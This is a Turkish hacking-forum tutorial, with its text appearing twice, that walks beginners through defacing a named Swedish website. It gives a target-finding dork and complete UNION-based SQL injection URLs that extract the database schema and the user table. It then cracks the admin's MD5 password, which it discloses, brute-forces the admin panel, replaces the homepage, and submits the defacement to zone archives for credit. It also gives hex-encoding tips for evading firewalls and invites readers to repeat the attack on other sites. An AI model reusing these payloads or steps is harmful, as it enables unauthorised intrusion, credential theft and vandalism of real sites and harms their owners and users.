Herkese merhaba arkadaşlar bu konumuzda sql injection ile nasıl sitelere index basılır bunu öğreteceğim aramızda yeni başlayan insanlar var bu konu tam sizlere göre yinede bu zafiyeti bilen varsada okumanızı öneririm 3-4 dk nızı ayırıcaksınız sadece ve en azından kendinize bişeyler katmış olursunuz neyse konumuza geçelim.
Bölümler:
1- Dork yazma
2- Zafiyet Tarama
3- Zafiyeti Sömürme
4- Şifreyi Kırma
5- Admin Panel Bulma
6- Admin Panele Giriş Yapma
7- İndex Atma
8- Zone Alma
9- Bitiş
1- Dork Yazma
ilk önce arkadaşlar sql zafiyeti olan site bulmanın olmassa olmazı dorktur benim bu partta kullanacağım dork budur:
Not: arkadaşlar siteye sqli denemeleri yapmadan önce isterseniz vpn açın açmasanızda olur ama öneririm
bu dorku yazdıktan sonra 4. sayfada arkivcentrum.se diye site buldum
girelim bu siteye
2- Zafiyet Tarama
bu sitede url'in sonuna ' işareti koyuyorum
3- Zafiyeti Sömürme
arkadaşlar eğer bir sitede sql açığı varsa hata da verebilir sql syntax vs. veya bunun gibi sayfada bi veri kaybı olur bu gibi şeyleri farkettiğimiz an sitede anlarız sql açığı olduğunu.
gördüğünüz gibi bizde veri kaybı oldu eğer
şimdi sitedeki kolon sayılarını çekicem kolon sayıları çekmek sql injecitonda yapmanız gereken ilk şeylerden biri.
bunu order by ile yaparız ve arkadaşlar sql sorgularında her yazdığınız kodun sonuna --+- yazın bu kod sizin yazdığınız koddan sonraki kodları (adamların yazdığı kodları) yorum satırı haline çeviriyor.
ve sitede değişiklik oldu geri geldi şimdi yine sitede veri kaybı yada hata olana kadar denemeler yapıcaz.
şuan biz siteye sadece 1 kolon mu var diye sorduk ve oda daha fazla olduğunu söyledi çünkü bir hata veri kaybı vs. olmadı sürekli denicez bunu
şimdi order by 10 yaptım ve veri kaybı yaşandı ' işareti koyduğum fotoğraf gibi oldu.
şimdi order by 8 yapıyorum yine aynı sonuç.
şimdi order by 7 yazıyorum ve sonuç:
demekki sitede 7 kolon varmış şimdi bu kolonları ekrana yazdırıcaz bunun komutu union select <1'den kolon sayısına kadar rakamlar>
kolon sayılarından herhangi biri ekrana yansımadı ' işaretini silelim belki olur
sitenin verileri geri geldi şimdi id=2 nin arasına - koyalım belki olur yani id=-2
ve gördüğünüz gibi 6 yansıdı ekrana şimdi sitenin database ismini öğrenelim kodumuz bu:
database ismi = arkivcentrum_searkivcentrum
şimdi tablo isimlerini öğrenelim
kod bu:
şu kısım;
0x61726b697663656e7472756d5f736561726b697663656e7472756d
bizim database ismimizin hex koduna çevirilmiş halidir. bir siteyi sql ile hacklemek isterseniz ve tabloları öğrenmek için bu kodu alırsanız şu hex kodunu kendi bulduğunuz database ismi ile değiştirin ama hex koduna çevirip yazın benim gibi, wafları falan atlatmış olursunuz hem hex koduna çevirilmeyince bazen çalışmıyor
arkiv_users da büyük ihtimal ya admin kullanıcılarının bilgileri var yada üyelerin. ikiside önemli bizim için bu tablonun sütunlarını ardından da datalarını çekelim.
sütunları çekme kodu:
table_name=0x61726b69765f7573657273 burdaki hex kodu tablonun ismi. başka site hacklicekseniz burdaki hex kodunu o sitedeki tablonun ismini hex koduna çevirip değiştirebilirsiniz.
id, user, password var id çok da önemli değil ama onuda çekelim sıkıntı yok.
ve gördüğünüz gibi admin bilgileri geldi, hakan diye biri var galiba türk admin var sitede ama hedef .se o yüzden kurallara aykırı değil diye düşünüyorum
admin1 büyük ihtimal en yetkili kullanıcı onun parolasını kıralım ve sitenin admin panelini bulup siteye girelim
4- Şifreyi Kırma
şimdi admin1 kullanıcısının md5 ile hashlenmiş şifresi bu:
e00cf25ad42683b3df678c61f42c6bda
bu şifreyi hashes.com sitesinden kırmayı deneyelim.
1. yere hashinizi yazın ve 2. yere tıklayıp hashi kırmayı deneyin.
ve gördüğünüz gibi kırdık
kullanıcı adı: admin1
parola: admin1
kolaydı
aksdjaklsdj
5- Admin Panel Bulma
şimdi sitenin admin panelini bulmak için wordlist ile brute force yapıyorum.
6- Admin Panele Giriş Yapma
sitenin admin panelide kolaymış admin panele girelim
loging in... diye alert verdi ok diyelim ve şimdi admin panele girdik bu arada bazı sitelerde admin bilgisine gerek kalmadan da admin olarak panele girebilirsiniz bunu da diğer partlarda anlatabilirim
article manager'a girelim.
bakalım bu sayfa sitede hangi sayfada
evet anasayfayı bulmuşuz çok güzel anasayfaya index atarız.
article manager'a geri dönelim ve buna basalım html kodu olarak sayfayı düzenlemeye yarıyor.
7- İndex Atma
adamların kendi kodları bu.
kendi kodlarımızla değiştirelim.
( eğer index kodunuz yoksa ghost hocamın yaptığı bu konudan yararlanabilirsiniz
https://www.turkhackteam.org/konular/turkhackteam-govde-gosterisi-sabit-index.2025459/ )
kendi index kodumuzu yapıştırdık ve save changes'e basalım
evet indeximiz anasayfaya düşmüş bu arada ben article manager dışında diğer yerlerede index attım ondan böyle
şimdi zone alalım.
8- Zone Alma
( zone sitenin ekran görüntüsü alır ve site eski haline dönsede bu ekran görüntüsü sayesinde siteyi hacklediğimiz kanıtlarız. )
ben bu siteden zone alıcam;
mirror-h
notify reporta basın ve 1,2,3 şeklinde yaptığım adımları uygulayın
benim zone'um yüklendi ve bu şekilde:
benim aldığım zone'a ulaşmak isterseniz linki veriyorum
benim zone'um
eğer arkadaşlar bu siteye index atıcaksanız mirrorda zone almayın çünkü TurkHackTeam adına alamazsınız ilk ben aldığım için ya başka bir nick ile alın yada başka zone sitelerinden alın
örnek zone siteleri:
zone-h.org ( bu siteyi pek önermem global bi site ama indeximiz görünmüyor )
ownzyou.com
archive.md
archive.is
9- Bitiş
Arkadaşlar eğer bu serinin devamını gelmesini istiyorsanız söyleyin çok istek gelirse 2. partını yapıcam en yakın zamanda.
Eğer düzeltmemi istediğiniz veya yanlış yaptığım yada ekstra eklemem gereken şeyler varsa belirtirseniz sevinirim.
Konumu okuduğunuz için hepinize çok teşekkür ederim.
Bölümler:
1- Dork yazma
2- Zafiyet Tarama
3- Zafiyeti Sömürme
4- Şifreyi Kırma
5- Admin Panel Bulma
6- Admin Panele Giriş Yapma
7- İndex Atma
8- Zone Alma
9- Bitiş
1- Dork Yazma
ilk önce arkadaşlar sql zafiyeti olan site bulmanın olmassa olmazı dorktur benim bu partta kullanacağım dork budur:
Kod:
inurl:php?id intext:inspiration site:se
Not: arkadaşlar siteye sqli denemeleri yapmadan önce isterseniz vpn açın açmasanızda olur ama öneririm
bu dorku yazdıktan sonra 4. sayfada arkivcentrum.se diye site buldum
girelim bu siteye
2- Zafiyet Tarama
bu sitede url'in sonuna ' işareti koyuyorum
3- Zafiyeti Sömürme
arkadaşlar eğer bir sitede sql açığı varsa hata da verebilir sql syntax vs. veya bunun gibi sayfada bi veri kaybı olur bu gibi şeyleri farkettiğimiz an sitede anlarız sql açığı olduğunu.
gördüğünüz gibi bizde veri kaybı oldu eğer
şimdi sitedeki kolon sayılarını çekicem kolon sayıları çekmek sql injecitonda yapmanız gereken ilk şeylerden biri.
bunu order by ile yaparız ve arkadaşlar sql sorgularında her yazdığınız kodun sonuna --+- yazın bu kod sizin yazdığınız koddan sonraki kodları (adamların yazdığı kodları) yorum satırı haline çeviriyor.
Kod:
https://www.arkivcentrum.se/index.php?id=2+order+by+1--+-
ve sitede değişiklik oldu geri geldi şimdi yine sitede veri kaybı yada hata olana kadar denemeler yapıcaz.
şuan biz siteye sadece 1 kolon mu var diye sorduk ve oda daha fazla olduğunu söyledi çünkü bir hata veri kaybı vs. olmadı sürekli denicez bunu
şimdi order by 10 yaptım ve veri kaybı yaşandı ' işareti koyduğum fotoğraf gibi oldu.
şimdi order by 8 yapıyorum yine aynı sonuç.
şimdi order by 7 yazıyorum ve sonuç:
demekki sitede 7 kolon varmış şimdi bu kolonları ekrana yazdırıcaz bunun komutu union select <1'den kolon sayısına kadar rakamlar>
SQL:
union+select+1,2,3,4,5,6,7
Kod:
https://www.arkivcentrum.se/index.php?id=2'+union+select+1,2,3,4,5,6,7--+-
kolon sayılarından herhangi biri ekrana yansımadı ' işaretini silelim belki olur
sitenin verileri geri geldi şimdi id=2 nin arasına - koyalım belki olur yani id=-2
ve gördüğünüz gibi 6 yansıdı ekrana şimdi sitenin database ismini öğrenelim kodumuz bu:
Kod:
database()
Kod:
https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,database(),7--+-
database ismi = arkivcentrum_searkivcentrum
şimdi tablo isimlerini öğrenelim
kod bu:
SQL:
(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x61726b697663656e7472756d5f736561726b697663656e7472756d)
şu kısım;
0x61726b697663656e7472756d5f736561726b697663656e7472756d
bizim database ismimizin hex koduna çevirilmiş halidir. bir siteyi sql ile hacklemek isterseniz ve tabloları öğrenmek için bu kodu alırsanız şu hex kodunu kendi bulduğunuz database ismi ile değiştirin ama hex koduna çevirip yazın benim gibi, wafları falan atlatmış olursunuz hem hex koduna çevirilmeyince bazen çalışmıyor
Kod:
https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x61726b697663656e7472756d5f736561726b697663656e7472756d),7--+-
arkiv_users da büyük ihtimal ya admin kullanıcılarının bilgileri var yada üyelerin. ikiside önemli bizim için bu tablonun sütunlarını ardından da datalarını çekelim.
sütunları çekme kodu:
SQL:
(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61726b69765f7573657273)
table_name=0x61726b69765f7573657273 burdaki hex kodu tablonun ismi. başka site hacklicekseniz burdaki hex kodunu o sitedeki tablonun ismini hex koduna çevirip değiştirebilirsiniz.
Kod:
https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61726b69765f7573657273),7--+-
id, user, password var id çok da önemli değil ama onuda çekelim sıkıntı yok.
SQL:
(SELECT+GROUP_CONCAT(ID,0x3a,user,0x3a,password+SEPARATOR+0x3c62723e)+FROM+arkivcentrum_searkivcentrum.arkiv_users)
Kod:
https://www.arkivcentrum.se/index.php?id=-2+union+select+1,2,3,4,5,(SELECT+GROUP_CONCAT(ID,0x3a,user,0x3a,password+SEPARATOR+0x3c62723e)+FROM+arkivcentrum_searkivcentrum.arkiv_users),7--+-
ve gördüğünüz gibi admin bilgileri geldi, hakan diye biri var galiba türk admin var sitede ama hedef .se o yüzden kurallara aykırı değil diye düşünüyorum
admin1 büyük ihtimal en yetkili kullanıcı onun parolasını kıralım ve sitenin admin panelini bulup siteye girelim
4- Şifreyi Kırma
şimdi admin1 kullanıcısının md5 ile hashlenmiş şifresi bu:
e00cf25ad42683b3df678c61f42c6bda
bu şifreyi hashes.com sitesinden kırmayı deneyelim.
1. yere hashinizi yazın ve 2. yere tıklayıp hashi kırmayı deneyin.
ve gördüğünüz gibi kırdık
kullanıcı adı: admin1
parola: admin1
kolaydı
aksdjaklsdj
5- Admin Panel Bulma
şimdi sitenin admin panelini bulmak için wordlist ile brute force yapıyorum.
6- Admin Panele Giriş Yapma
sitenin admin panelide kolaymış admin panele girelim
loging in... diye alert verdi ok diyelim ve şimdi admin panele girdik bu arada bazı sitelerde admin bilgisine gerek kalmadan da admin olarak panele girebilirsiniz bunu da diğer partlarda anlatabilirim
article manager'a girelim.
bakalım bu sayfa sitede hangi sayfada
evet anasayfayı bulmuşuz çok güzel anasayfaya index atarız.
article manager'a geri dönelim ve buna basalım html kodu olarak sayfayı düzenlemeye yarıyor.
7- İndex Atma
adamların kendi kodları bu.
kendi kodlarımızla değiştirelim.
( eğer index kodunuz yoksa ghost hocamın yaptığı bu konudan yararlanabilirsiniz
https://www.turkhackteam.org/konular/turkhackteam-govde-gosterisi-sabit-index.2025459/ )
kendi index kodumuzu yapıştırdık ve save changes'e basalım
evet indeximiz anasayfaya düşmüş bu arada ben article manager dışında diğer yerlerede index attım ondan böyle
şimdi zone alalım.
8- Zone Alma
( zone sitenin ekran görüntüsü alır ve site eski haline dönsede bu ekran görüntüsü sayesinde siteyi hacklediğimiz kanıtlarız. )
ben bu siteden zone alıcam;
mirror-h
notify reporta basın ve 1,2,3 şeklinde yaptığım adımları uygulayın
benim zone'um yüklendi ve bu şekilde:
benim aldığım zone'a ulaşmak isterseniz linki veriyorum
benim zone'um
eğer arkadaşlar bu siteye index atıcaksanız mirrorda zone almayın çünkü TurkHackTeam adına alamazsınız ilk ben aldığım için ya başka bir nick ile alın yada başka zone sitelerinden alın
örnek zone siteleri:
zone-h.org ( bu siteyi pek önermem global bi site ama indeximiz görünmüyor )
ownzyou.com
archive.md
archive.is
9- Bitiş
Arkadaşlar eğer bu serinin devamını gelmesini istiyorsanız söyleyin çok istek gelirse 2. partını yapıcam en yakın zamanda.
Eğer düzeltmemi istediğiniz veya yanlış yaptığım yada ekstra eklemem gereken şeyler varsa belirtirseniz sevinirim.
Konumu okuduğunuz için hepinize çok teşekkür ederim.